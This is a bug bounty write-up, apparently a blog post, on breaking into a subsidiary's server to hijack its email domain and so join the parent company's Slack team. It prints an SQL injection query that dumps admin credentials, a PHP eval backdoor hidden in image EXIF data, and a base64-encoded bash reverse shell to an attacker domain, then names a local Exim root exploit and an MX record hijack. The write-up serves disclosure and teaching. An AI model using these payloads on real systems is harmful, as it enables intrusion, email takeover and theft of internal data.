Pwning child company to get access to ParentCompany's Slack Team

Disclaimer : Prior permissions were taken before performing heavy attacks on the targets below, you should not try this without taking prior permission.

The following was reported to a program on HackerOne, I have redacted the company name, lets call it ParentCompany. So, ParentCompany has a program on HackerOne which has a child company lets say it , The childcompany was not in scope of the program nor mentioned anywhere on the policy page, but hacking inside it led to something which could have a critical security impact to the company. Here is the exact report i submitted on HackerOne with some redaction  :

Hello ParentCompany,

Going to the Slack url of ParentCompany : shows that If you have an or email address, you can create an account.


The thing which interests me is the website, So If i am able to read emails of i can get inside ParentCompany's Slack Team

Performing a whois search shows the organization to be ChildCompany with the nameservers and

XX.XX.XX.XX is the server ip of

Visiting http://XX.XX.XX.XX/ redirects to http://XX.XX.XX.XX/cgi-sys/defaultwebpage.cgi which displays :


Great Success ! 
Apache is working on your cPanel® and WHM™ Server

So we have cPanel running on the server ( http://XX.XX.XX.XX:2082/ ) which means that somehow if we can get access to the server we can edit the zone file and add our MX records and receive mails with the address

So just to assume somehow we got access to the server, we still need to be root to edit the zone file of to add our MX Records.

Doing a nmap scan against shows that its running Exim smtpd 4.80 on port 26

26/tcp   open   smtp     Exim smtpd 4.80

Exim <= 4.84-3 has a very simple local root exploit (#REF: )

Ok so we know that cPanel is running on the server and we have a local root exploit by which we can possibly modify the zone file of to add our MX Records Now the most important step, We need a RCE on the server

SQLi :

Visiting the website i found mostly all of the files are vulnerable to SQLi'

A warning can be seen on the page :

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/childcompany/public_html/somedirectory/randomfile.php on line 181

We also have admin panel at

The Following Query will fetch the credentials of admin panel :*!select*/+group_concat(user,0x3a,pass)+from+Login--+

which gives us :


We can login inside the Admin panel using the credentials admin:redactedpass. Inside the admin panel we can upload images by going to

So the uploader checks whether the uploaded file is a valid image or not but doesn't checks for the file extension, so we can upload a image with PHP backdoor in exif data, So I uploaded a image with <?php echo eval(base64_decode($_GET['cmd'])); ?><!-- in the comments of the image using the tool Exif Pilot.

Here is The Link to file executing the command id :


So now lets gain a backconnect shell, after trying many methods the following seems to work. We need to use a domain name instead of IP to gain the backconnect shell and firewall rules only allowed outbound connections to ports 80 and 443, Now to get the backconnect shell we need to save our backconnect payload into a file inside /tmp/ as somehow the server is blocking direct back connect through executing the command by the shell, but saving it in a file and executing the file seems to work, we can save the payload by the following command :

$dt=base64_decode("YmFzaCAtaSA+JiAvZGV2L3RjcC9teWRvbWFpbi5jb20vODAgMD4m");$fp=fopen("/tmp/1","a+");fputs($fp,$dt);fclose($fp); echo "ok";

Where YmFzaCAtaSA+JiAvZGV2L3RjcC9teWRvbWFpbi5jb20vODAgMD4m is the backconnect payload bash -i >& /dev/tcp/ 0>&1 and then run it by running the command bash /tmp/1
This Saves our payload inside /tmp/1 :

And then run it by visiting :

So we will get a backconnect and can easily gain root just by 2-3 commands :
Here is the zone file where all the DNS records are stored for the domain :


Now as we are root we can simply add our MX records of any free business email provider such as ZohoMail by editing the zone file /var/named/ and then run the command rndc reload to update the dns records. So now we can receive mails on behalf of and simply request a signup link to get inside ParentCompany's Slack Team and from there view internal communications between employees and attacker can pivot further to get access to

Parth :)


You should always check if you can somehow read emails of, of the domain(s) mentioned in if it allows signup through email, may it be Ticket Trick, credientials found on GitHub or hacking inside an out of scope asset (with prior permissions ofcourse), as access to a company's slack can result in gaining full access to the company's servers, sensative information etc.

Thanks Sandeep for proofreading.